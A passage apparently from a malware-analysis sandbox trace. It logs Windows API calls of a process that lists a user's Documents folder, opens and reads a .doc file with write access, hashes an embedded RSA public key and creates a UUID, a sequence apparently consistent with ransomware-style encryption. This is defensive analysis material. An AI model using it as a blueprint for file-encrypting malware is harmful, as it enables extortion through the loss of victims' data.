RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0203.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0203.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0203.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0203.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0203.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0203.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0203.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0203.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0203.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0203.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0203.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0203.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0203.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0203.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0203.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0203.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0203.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0203.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0203.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0203.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0203.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0203.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0203.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.961] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0203.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e1f8 [0203.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.961] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0203.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0203.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6e1f8 | out: hHeap=0x2c0000) returned 1 [0203.961] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0203.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.961] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0203.961] PathFindFileNameW (pszPath="") returned="" [0203.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.961] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd93ece20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd93ece20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0203.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.962] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd93ece20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd93ece20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0203.962] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49a8e310, ftCreationTime.dwHighDateTime=0x1d5e535, ftLastAccessTime.dwLowDateTime=0x72144ca0, ftLastAccessTime.dwHighDateTime=0x1d5db2a, ftLastWriteTime.dwLowDateTime=0x72144ca0, ftLastWriteTime.dwHighDateTime=0x1d5db2a, nFileSizeHigh=0x0, nFileSizeLow=0x164b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2A46Wijpabeg.doc", cAlternateFileName="2A46WI~1.DOC")) returned 1 [0203.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2ef090 [0203.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2A46Wijpabeg.doc") returned=".doc" [0203.962] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2A46Wijpabeg.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2a46wijpabeg.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.963] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=91315) returned 1 [0203.963] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.965] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1648d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.965] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.967] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.967] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x164b3, lpOverlapped=0x0) returned 1 [0203.968] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0203.968] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.968] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.968] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0203.969] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.969] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.969] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0203.969] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.969] GetLastError () returned 0x0 [0203.969] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.969] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0203.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.970] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.970] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.970] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x164b0) returned 0x3b80690 [0203.970] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0203.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0203.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0203.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e1f8 